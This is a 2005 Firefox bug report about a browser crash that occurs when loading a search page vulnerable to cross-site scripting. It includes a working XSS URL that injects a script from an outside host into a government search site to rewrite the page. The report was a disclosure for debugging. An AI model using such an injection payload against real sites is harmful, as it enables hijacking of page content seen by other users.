Closed Bug 301007 Opened 19 years ago Closed 19 years ago

Crashes Mozilla when URL loads

Categories

(Firefox :: General, defect)

x86
Windows 2000
defect
Not set
critical

Tracking

()

VERIFIED WORKSFORME

People

(Reporter: mozilla, Unassigned)

References

()

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4

The above URL is an exploit, demonstrating how an insecure search can be used to
hijack a webpage's content.  This exploit is with WebGlimpse, NOT Mozilla.  The
Problem with Mozilla is that 75% of the time the browser crashes.
<P>
This has been seen on Windows 2000 and Windows 98.  Could someone with Deer Park
verify that this is still a problem?
<P>
The exploit has been reported to WebGlimpse, so I expect they will fix the above
URL soon.

Reproducible: Sometimes

Steps to Reproduce:
1. Click URL.

Actual Results:  
Mozilla usually crashes.

Expected Results:  
A page like this should have been displayed:
http://search.access.gpo.gov/usoge/SearchRight.asp?ct=usoge&q1=%3CSCRIPT+SRC%3D%27http%3A%2F%2Fneil.fraser.name%2Fnews%2F2005%2Fhijack.js%27%3E%3C%2FSCRIPT%3E&x=0&y=0

The script (http://neil.fraser.name/news/2005/hijack.js) executes this statement
to rewrite the entire page:
  document.body.innerHTML = text
where 'text' is the desired content.  This works on the 25 other pages I've
tested it on, but the WebGlimpse page seems to be different.

If someone could verify this bug and confirm its existance in Deer Park, I'll do
some work to isolate it with a minimal test case.  My crash ID is: TB7531346E
No crash with WinXP.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050716
Firefox/1.0+ ID:2005071602
WFM - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b3) Gecko/20050713
Firefox/1.0+
wfm with Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.8b2) Gecko/20050701

marking wfm, please reopen if you can reproduce this with a recent Trunk build.


Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.